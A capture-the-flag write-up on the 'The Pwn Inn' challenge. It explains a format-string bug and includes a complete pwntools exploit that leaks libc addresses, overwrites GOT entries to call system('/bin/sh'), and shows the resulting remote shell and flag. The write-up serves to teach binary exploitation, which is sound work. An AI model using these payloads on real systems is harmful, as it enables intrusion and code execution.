The Pwn Inn

2021-02-01

Recon

First things first, let’s check what mitigations are enabled in the binary so that we can get a clear idea of what exploits are doable.

$ checksec --file=./the_pwn_inn
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   82) Symbols       No    0               2               ./the_pwn_inn

I should add that the hint for this challenge reads: "We've had many famous faces stay in our Inn, with gets() and printf() rating us 5 stars." If we take into account that the binary is not position independent and that the GOT is writable (Partial RELRO), we get a very clear idea of what the exploit will look like. But let’s not get ahead of ourselves; let’s actually check what the code looks like.

If you’re unfamiliar with the GOT and how it works, it’s highly recommended that you go read a bit about it before going through this write-up. You can read my other write-up on “external” from this same CTF for a quick and dirty introduction.

: int main (int argc, char **argv, char **envp);
; var int64_t canary @ rbp-0x8
0x00401328      push    rbp
0x00401329      mov     rbp, rsp
0x0040132c      sub     rsp, 0x10
0x00401330      mov     rax, qword fs:[0x28]
0x00401339      mov     qword [canary], rax
0x0040133d      xor     eax, eax

		; ignore_me_init_buffering()
0x0040133f      mov     eax, 0
0x00401344      call    ignore_me_init_buffering ; sym.ignore_me_init_buffering

		; ignore_me_init_signal()
0x00401349      mov     eax, 0
0x0040134e      call    ignore_me_init_signal ; sym.ignore_me_init_signal

		; puts("Welcome to the pwn inn! We hope you enjoy your stay. What's your name? ")
0x00401353      lea     rdi, str.Welcome_to_the_pwn_inn__We_hope_that_you_enjoy_your_stay._What_s_your_name ; 0x402040 ; const char *s
0x0040135a      call    puts       ; sym.imp.puts ; int puts(const char *s)

		; vuln()
0x0040135f      mov     eax, 0
0x00401364      call    vuln       ; sym.vuln

		; [canary check]
0x00401369      mov     eax, 0
0x0040136e      mov     rdx, qword [canary]
0x00401372      sub     rdx, qword fs:[0x28]
0x0040137b      je      0x401382
0x0040137d      call    __stack_chk_fail ; sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)

		; return 0
0x00401382      leave
0x00401383      ret

; comments added for clarity

OK, not much to see there. Let’s take a look at vuln then:

: vuln ();
; var char *format @ rbp-0x110
; var int64_t var_8h @ rbp-0x8
0x004012c4      push    rbp
0x004012c5      mov     rbp, rsp
0x004012c8      sub     rsp, 0x110
0x004012cf      mov     rax, qword fs:[0x28]
0x004012d8      mov     qword [var_8h], rax
0x004012dc      xor     eax, eax

		; fgets(format, 0x100, stdin)
0x004012de      mov     rdx, qword [stdin] ; obj.stdin__GLIBC_2.2.5
                                   ; 0x404090 ; FILE *stream
0x004012e5      lea     rax, [format]
0x004012ec      mov     esi, 0x100 ; 256 ; int size
0x004012f1      mov     rdi, rax   ; char *s
0x004012f4      call    fgets      ; sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)

		; printf("Welcome ")
0x004012f9      lea     rdi, str.Welcome ; 0x402037 ; const char *format
0x00401300      mov     eax, 0
0x00401305      call    printf     ; sym.imp.printf ; int printf(const char *format)

		; printf(format)
0x0040130a      lea     rax, [format]
0x00401311      mov     rdi, rax   ; const char *format
0x00401314      mov     eax, 0
0x00401319      call    printf     ; sym.imp.printf ; int printf(const char *format)

		; exit(1)
0x0040131e      mov     edi, 1     ; int status
0x00401323      call    exit

Well, this is interesting. We get to control a format string that will later be fed into printf. The only catch is that the format string is read via fgets, which stops reading at the first newline, so our payloads must not contain a 0x0a byte (we’ll need to be careful with this when sending payloads).

Ok, first things first, we’ll want to get the version of the libc in use on remote. Once we have the libc, we can use offsets to calculate the address of system, given the address of some other function.

Getting the libc version

We’ve got only one printf before execution finishes (we will later see why this is not entirely true, but let’s roll with it for now), so we can use that one format string to make printf give us the content of some GOT entry. The format buffer sits at the top of the stack when printf is called, which means that the first 8 bytes of our buffer are treated as the 7th parameter to printf (recall that under the System V calling convention the first 6 parameters are passed in rdi, rsi, rdx, rcx, r8 and r9; the 7th one is retrieved from the top of the stack, the 8th one is the second to top element of the stack, and so on). Since the format string itself is the 1st parameter, a directive such as %7$s refers to the 7th argument after it, that is, the 8th parameter overall. So we can ask printf to give us the string pointed to by the ‘8th parameter’ and place the address of some GOT entry there. Summing up, our malicious string will look something like this: "%7$sAAAA[addressOfGotEntryHere]" (the 7th parameter is the string "%7$sAAAA" and the 8th parameter is [addressOfGotEntryHere], which should be 8 bytes long). This tricks printf into leaking libc addresses. Eventually the program is going to exit, but by that point we’ll have already leaked the address we wanted.
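To make the numbering concrete, here is a minimal sketch of where printf fetches the argument for a positional directive %N$ on x86-64 System V. The helper names (positionalSource, buildLeakPayload) are made up for illustration, and the mapping assumes the stack layout described above, with our buffer starting at the first stack slot.

```python
import struct

# Registers holding the variadic arguments; rdi holds the format string itself.
ARG_REGISTERS = ['rsi', 'rdx', 'rcx', 'r8', 'r9']

def positionalSource(n):
    """Return where printf reads the argument for %n$ (n >= 1)."""
    if n < 1:
        raise ValueError('positional indices start at 1')
    if n <= len(ARG_REGISTERS):
        return ARG_REGISTERS[n - 1]
    # From %6$ onwards the arguments come from consecutive 8-byte stack slots.
    return f'stack slot {n - len(ARG_REGISTERS) - 1}'

def buildLeakPayload(address):
    """8 bytes of format text (stack slot 0) followed by the address (slot 1)."""
    return b'%7$sAAAA' + struct.pack('<Q', address)

for n in (1, 5, 6, 7):
    print(f'%{n}$ -> {positionalSource(n)}')
print(buildLeakPayload(0x404030))
```

Under these assumptions %6$ lands on the first 8 bytes of the buffer and %7$ on the 8 bytes right after it, which is why the address goes in the second slot.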

Here’s a quick crash-course from Georgia Tech on format string vulnerabilities and how they can be used to perform arbitrary memory read/writes, for those of you who are unfamiliar with it.

The code for this looks something like this:

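def isValidInput(byteStr):
    # Iterating over bytes yields ints in Python 3, so test membership directly.
    # fgets(buf, 0x100, stdin) stores at most 0xff bytes, and sendline adds a newline.
    return b'\n' not in byteStr and len(byteStr) < 0xff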

def leakLibcAddress(p, address):
    formatString = b'%7$s\x00\x00\x00\x00' + p64(address) # Use b'\x00' instead of b'A' so that
                                                          # the output doesn't get too cluttered

    if not isValidInput(formatString):
        p.error('The payload contains illegal bytes')
    
    p.sendline(formatString)
    p.recvuntil(b'Welcome ')
    res = p.recv(8)

    if len(res) < 0x8:
        res += (0x8 - len(res)) * b'\x00'

    return u64(res)

got = {
    'puts': 0x404020,
    'printf': 0x404030,
    'fgets': 0x404040,
    'setvbuf': 0x404050
}

for sym in got:
    p = remote(rhost, rport)
    p.recvuntil(b'name? \n')
    p.info(f'{sym} @ {hex(leakLibcAddress(p, got[sym]))}')
    p.close()

This will give us the address of each libc function used in the binary. The program is executed once per symbol, so ASLR will most likely load the libc at a different base address each time, but that doesn’t matter: all we care about are the 12 least significant bits of each address, which are the offset within a page and therefore don’t depend on where the libc is loaded. This is an example output:

$ python3 exploit.py
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] puts @ 0x7f172a4235a0
[*] Closed connection to 185.172.165.118 port 2626
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] printf @ 0x7fc10ec2ae10
[*] Closed connection to 185.172.165.118 port 2626
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] fgets @ 0x7f1d2d6367b0
[*] Closed connection to 185.172.165.118 port 2626
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] setvbuf @ 0x7fb763c92e60
[*] Closed connection to 185.172.165.118 port 2626

Using the last twelve bits for each function, we can identify the libc version using some online libc database. The resulting version is: libc6_2.31-0ubuntu9_amd64. Ok, so given that information we now know that the address for system is equal to the address of printf minus 0xfa00.
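As a sanity check on the arithmetic, the snippet below takes the addresses printed in the example runs of this write-up, extracts the 12 low bits that get fed to the libc database, and confirms the distance between printf and system. It does not query any database, and the names (leaked, pageOffset) are just for illustration.

```python
# Addresses taken from the example outputs in this write-up.
leaked = {
    'puts': 0x7f172a4235a0,
    'printf': 0x7fc10ec2ae10,
    'fgets': 0x7f1d2d6367b0,
    'setvbuf': 0x7fb763c92e60,
}

def pageOffset(address):
    """Low 12 bits: the offset inside a 4 KiB page, unaffected by ASLR."""
    return address & 0xfff

for name, address in leaked.items():
    print(f'{name}: 0x{pageOffset(address):03x}')

# printf and system as logged by the final exploit run.
printfAddr = 0x7f0492f14e10
systemAddr = 0x7f0492f05410
offset = printfAddr - systemAddr
print(hex(offset))
```

The per-symbol low bits are what you would paste into the database search, and the last line reproduces the offset used in the exploit.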

Exploitation

Now that we have the offset between printf and system we can leak the address of printf again, but this time we will use it to locate system, and eventually call it. But first we need to find a way to execute a second printf, since vuln calls exit instead of returning. It is here that we can exploit the second interesting property of printf: the fact that it can do arbitrary memory writes.

Normally when using printf to do arbitrary writes we’d need to keep an eye on the size of the buffer, but since the buffer in which our format string is stored is big enough, we don’t need to worry about sizes for now.

Let’s take a look at an example:

Suppose we wanted to make the GOT entry for exit point to 0. We could execute printf with "%7$llnAA[exitGotAddress]". This way nothing is printed before the %lln directive is processed, so printf writes the number of bytes written so far (namely, 0) to the address stored in exitGotAddress. Of course we don’t want to write zero to the GOT entry for exit, but the idea is the same for any arbitrary number (using printf’s %.[n]u directive to print n characters first), as long as its decimal representation fits inside the format string alongside the desired address. Luckily, pwntools provides us with a function to generate these strings automatically.
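For illustration, here is a hand-rolled sketch of such a single-write string. It is not what pwntools generates: singleWritePayload and its parameters are hypothetical, it assumes the first 8 bytes of the buffer correspond to %6$, and it uses the common %[n]c padding idiom instead of %.[n]u.

```python
import struct

def singleWritePayload(value, address, firstStackIndex=6, fmtLen=16):
    """Build a format string that stores `value` at `address` with one %lln."""
    if fmtLen % 8:
        raise ValueError('fmtLen must be a multiple of 8')
    # The address is placed right after fmtLen bytes of format text.
    addressIndex = firstStackIndex + fmtLen // 8
    # %<value>c prints `value` characters, which is the count %lln then stores.
    pad = f'%{value}c' if value else ''
    fmt = f'{pad}%{addressIndex}$lln'.encode()
    if len(fmt) > fmtLen:
        raise ValueError('directives do not fit in fmtLen bytes')
    # Filler after %lln is printed too late to affect the stored count.
    return fmt.ljust(fmtLen, b'A') + struct.pack('<Q', address)

# Write 0 to exit's GOT entry, then the address of vuln.
print(singleWritePayload(0, 0x404058, fmtLen=8))
print(singleWritePayload(0x4012c4, 0x404058))
```

A single write like the second one forces printf to emit about four million padding characters, which is one reason fmtstr_payload splits the value into several smaller writes by default.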

So, using a format string like that we can make the GOT entry for exit point to the start of the vuln function. That way we wrap vuln inside a ‘loop’ of sorts. Now that the vulnerable code will be executed an indefinite number of times, we can proceed with the rest of the exploit. We can leak printf’s address by reading the GOT (using the code above) and compute the address of system.

Once that’s done we need to actually call system. That can get a bit tricky, since vuln never returns, and building a ROP chain would be painful since the stack keeps growing (the prologue for vuln gets executed on every iteration). The quick and dirty solution I came up with was to overwrite the GOT entry for printf with the address of system. Why would this work? Well, once we make printf ‘point’ to system, vuln will read a string from us again. At that point we can enter something like "/bin/sh" (with a null byte at the end), and two calls to printf will be executed after that:

One will be printf("Welcome "), which will be equivalent to system("Welcome "). That tries to run a command called Welcome. Since that’s most likely a non-existent program, the call will just fail and return -1 or some error code (but the program itself won’t crash, which is important to bear in mind).
The second one will be printf("/bin/sh"), which will be equivalent to system("/bin/sh"). That’s what we wanted from the very beginning!

Putting it all together

Let’s recap, here’s a quick sketch of the plan:

Leak as many libc addresses as possible (doesn’t matter if this gets done across different executions)
Get the libc version by looking at the 12 least significant bits of those addresses
Use the information from that libc to calculate the offset between system and printf

On the execution of the actual exploit:

Make exit point to vuln by overwriting the corresponding GOT entry
Leak the address of printf and use that to calculate the address of system
Overwrite the entry for printf in the GOT with the address of system
Send the string "/bin/sh\x00"

The code looks like this:

from pwn import *

context.update(os='linux', arch='amd64')

rhost = '185.172.165.118'
rport = 2626

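def isValidInput(byteStr):
    # Iterating over bytes yields ints in Python 3, so test membership directly.
    # fgets(buf, 0x100, stdin) stores at most 0xff bytes, and sendline adds a newline.
    return b'\n' not in byteStr and len(byteStr) < 0xff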

def leakLibcAddress(p, address):
    formatString = b'%7$s\x00\x00\x00\x00' + p64(address)

    if not isValidInput(formatString):
        p.error('The payload contains illegal bytes')
    
    p.sendline(formatString)
    p.recvuntil(b'Welcome ')
    res = p.recv(8)

    if len(res) < 0x8:
        res += (0x8 - len(res)) * b'\x00'

    return u64(res)

got = {
    'puts': 0x404020,
    'printf': 0x404030,
    'fgets': 0x404040,
    'setvbuf': 0x404050
}

#for sym in got:
#    p = remote(rhost, rport)
#    p.recvuntil(b'name? \n')
#    p.info(f'{sym} @ {hex(leakLibcAddress(p, got[sym]))}')
#    p.close()

p = remote(rhost, rport)

# Every time we send a payload, we need to make sure it doesn't
# contain newline characters, and that it doesn't exceed the buffer
# size. This should all live in a separate helper function, but
# I was too lazy to do it the right way

# Also, after sending a "writing" format string, printf emits
# padding characters before it performs the write. We read that
# output back (recv(n) returns at most n bytes) so that the whole
# thing works more reliably and we don't have problems with
# timeouts, buffers, etc.

# Send the payload which will make exit point to vuln
closeLoopStr = fmtstr_payload(6, {0x404058: 0x4012c4})
if not isValidInput(closeLoopStr):
    p.error('Payload contains illegal bytes')
p.recvuntil(b'name? \n')
p.sendline(closeLoopStr)
p.recvuntil(b'Welcome ')
p.recv(0x4012c4)


# Leak printf address
p.recvuntil(b'name? \n')
printfAddr = leakLibcAddress(p, got['printf'])

p.info('printf @ ' + hex(printfAddr))
# Use the offset calculated previously
systemAddr = printfAddr - 0xfa00
p.info('system @ ' + hex(systemAddr))

# Make printf point to system
printf2systemStr = fmtstr_payload(6, {0x404030: systemAddr})
if not isValidInput(printf2systemStr):
    p.error('Payload contains illegal bytes')
p.recvuntil(b'name? \n')
p.sendline(printf2systemStr)
p.recvuntil(b'Welcome ')
p.recv(systemAddr)

# Send "/bin/sh"
p.recvuntil(b'name? \n')
p.sendline(b'/bin/sh\x00')

# Profit!
p.clean()
p.interactive()

And here it is in action:

$ python3 exploit.py
[+] Opening connection to 185.172.165.118 on port 2626: Done
[*] printf @ 0x7f0492f14e10
[*] system @ 0x7f0492f05410
[*] Switching to interactive mode
$ ls
flag.txt
lib
lib64
temp
the_pwn_inn
ynetd
$ cat flag.txt
flag{GOTt4_b3_OVERWRITEing_th0s3_symb0ls_742837423}
$

Post written by @OctavioGalland